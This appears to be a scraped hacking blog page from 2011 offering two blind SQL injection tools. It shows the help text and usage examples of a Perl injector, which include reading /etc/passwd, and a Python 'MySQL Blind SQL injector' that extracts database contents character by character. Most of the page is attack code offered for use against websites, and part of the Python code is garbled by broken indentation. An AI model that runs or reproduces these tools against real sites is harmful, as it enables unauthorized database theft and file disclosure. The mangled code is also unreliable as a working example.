    print"\nInteger based Injection-->$0 - url http://www.host.com/path/script.php?foo=1000 [options]\n ";
    print "\nString Based Injection-->$0 - url http://www.host.com/path/script.php?foo=bar' [options]\n  ";
    print "\n ------------------------------------options:--------------------------\n";
    print " -sql:\t\tvalid SQL syntax to get; version(), database(),\n";
    print "\t\t\query like-->(select  table_name from inforamtion_schema.tables limit 1 offset 0)\n";
    print " -get: \t\tIf MySQL user is root, supply word readable file name\n";
    print " -blind:\tparameter to inject sql. Default is last value of url\n";
    print " -match:\t*RECOMMENDED* string to match in valid query, Default is try to get auto\n";
    print " -start:\tif you know the beginning of the string, use it.\n";
    print " -length:\tmaximum length of value. Default is $default_length.\n";
    print " -time:\t\ttimer options:\n";
    print " \t0:\tdont wait. Default option.\n";
    print " \t1:\twait 15 seconds\n";
    print " \t2:\twait 5 minutes\n";
    print " -type:\t\tType of injection:\n";
    print " \t0:\tType 0 (default) is blind injection based on True and False responses\n";
    print " \t1:\tType 1 is blind injection based on True and Error responses\n";
    print " -database:\tBackend database:\n";
    print " \t0:\tMS-SQL (Default)\n";
    print " \t1:\tMYSQL\n";
    print " \t2:\tPOSTGRES\n";
    print " \t3:\tORACLE\n";
    print " -rtime:\twait random seconds, for example: \"10-20\".\n";
    print " -method:\thttp method to use; get or post. Default is $default_method.\n";
    print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
    print " -ruagent:\tfile with random http UserAgent header to use.\n";
    print " -cookie:\thttp cookie header to use\n";
    print " -rproxy:\tuse random http proxy from file list.\n";
    print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
    print " -proxy_user:\tproxy http user\n";
    print " -proxy_pass:\tproxy http password\n";
    print "\n---------------------------- examples:-------------------------------\n";
    print "\n perl $0 -url http://www.target.com/blah.php?u=5 -blind u -sql \"select table_name from imformation_schema.tables limit 1 offset 0\" -database 1 -type 1\n";
    print "\n perl $0 -url http://www.target.com/bug.php?r=514&p=foo' -method post -get \"/etc/passwd\" -match \"foo\"\n";
    exit(1);
}

happy c0ding :)

Minggu, 23 Januari 2011

MySQL Blind SQL injector

This c0de is name deadc0de_blindSQL.py

# SQLInjector   -  MySQL Blind SQL injector
# by Deadc0de - Team
# known issues;
# uses md5 for page comparison rather than searching for a string.   This can be a problem if the page includes dynamic banner ads. 
# M,N and 0-9 period and comma are not representative of the actual correct frequent character set
# lettertable() function needs be expanded but there is a performance hit the bigger it gets

import md5, sys, urllib2, sys
import pdb

def lettertable(letter):
   return {
           "q":"uaqoisvretwybnhlxmfpzcdjgk_1234567890.,",
           "w":"ahieonsrldwyfktubmpcgzvjqx_1234567890.,",
           "e":"rndsaletcmvyipfxwgoubqhkzj_1234567890.,",
           "r":"eoiastydnmrugkclvpfbhwqzjx_1234567890.,",
           "t":"hoeiartsuylwmcnfpzbgdjkxvq_1234567890.,",
           "y":"oesitamrlnpbwdchfgukzvxjyq_1234567890.,",
           "u":"trsnlgpceimadbfoxkvyzwhjuq_1234567890.,",
           "i":"ntscolmedrgvfabpkzxuijqhwy_1234567890.,",
           "o":"nurfmtwolspvdkcibaeygjhxzq_1234567890.,",
           "p":"eroaliputhsygmwbfdknczjvqx_1234567890.,",
           "l":"eliayodusftkvmpwrcbgnhzqxj_1234567890.,",
           "k":"einslayowfumrhtkbgdcvpjzqx_1234567890.,",
           "j":"euoainkdlfsvztgprhycmjxwbq_1234567890.,",
           "h":"eaioturysnmlbfwdchkvqpgzjx_1234567890.,",
           "g":"ehroaiulsngtymdwbfpzkxcvjq_1234567890.,",
           "f":"oeriafutlysdngmwcphjkbzvqx_1234567890.,",
           "d":"eioasruydlgnvmwfhjtcbkpqzx_1234567890.,",
           "s":"tehiosaupclmkwynfbqdgrvjzx_1234567890.,",
           "a":"ntrsldicymvgbpkuwfehzaxjoq_1234567890.,",
           "z":"eiaozulywhmtvbrsgkcnpdjfqx_1234567890.,",
           "x":"ptcieaxhvouqlyfwbmsdgnzrkj_1234567890.,",
           "c":"oheatikrlucysqdfnzpmgxbwvj_1234567890.,",
           "v":"eiaoyrunlsvdptjgkhcmbfwzxq_1234567890.,",
           "b":"euloyaristbjmdvnhwckgpfzxq_1234567890.,",
           "m":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
           "n":"tashwiobmcfdplnergyuvkjqzx_1234567890.,",
           "1":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "2":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "3":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "4":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "5":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "6":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "7":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "8":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "9":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "0":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           ".":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           ",":"1234567890.,-tashwiobmcfdplnergyuvkjqzx_",
           "_":"tashwiobmcfdplnergyuvkjqzx_1234567890.,-",
    }[letter]

def md5sum(value):
    hasher = md5.new()
    hasher.update(value)
    return hasher.hexdigest()

def fetch_page(url):
    request = urllib2.Request(url)
    requestor = urllib2.build_opener()
    request.addheaders = [('User-agent', 'Mozilla/5.0')]
    content = requestor.open(request).read()
    return content

def hsbrute(targeturl):
    #pdb.set_trace()
    urlstart, sqlquery, urlend = targeturl.split("^")
    truehash = md5sum(fetch_page(urlstart + "/**/and/**/1=1/**/"+urlend))
    falsehash = md5sum(fetch_page(urlstart + "/**/and/**/1=0/**/"+urlend))
    if falsehash==truehash:
     print "Not Injectable.  Check this URL with a browser (and try 1=0)."+urlstart + "/**/and/**/1=1/**/"+urlend
     sys.exit(1)
    global attemptcounter
    ret_str = []
    last_ltr = ""
    element_found=0
    i=-1
    while not element_found:
      i += 1
      b_arr = "tashwiobmcfdplnergyuvkjqzx_1234567890"
      if last_ltr :
        b_arr=lettertable(last_ltr)
      for j in range(len(b_arr)):
       brute = b_arr[j]
       querystring = urlstart+"/**/and/**/lower(mid("+sqlquery+","+str(i+1)+",1))=char("+ str(ord(brute)) +")/**/"+urlend
    attemptcounter += 1
#print querystring
if md5sum(fetch_page(querystring))==truehash:
#print "is true"
    ret_str.append(b_arr[j])
    print "".join(ret_str[:])
    last_ltr=b_arr[j]
#print "is false"
if j == len(b_arr)-1 :
    print "end of word found"
    element_found=1
def printhelp():
  print """Here is your help.
python sqlinjector.py  http://www.urltotarget.com/sqlinjectable.php?vulnerable=target^sql statement here^restoftheURL=value
Example -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}"
"""

if "-h" in sys.argv:
  printhelp()
  sys.exit(2)


target="http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
if sys.argv[1]:
 target = sys.argv[1]
current=0
attemptcounter=0
print "Found target " + "".join(hsbrute(target)) + " in " + str(attemptcounter) + " guesses."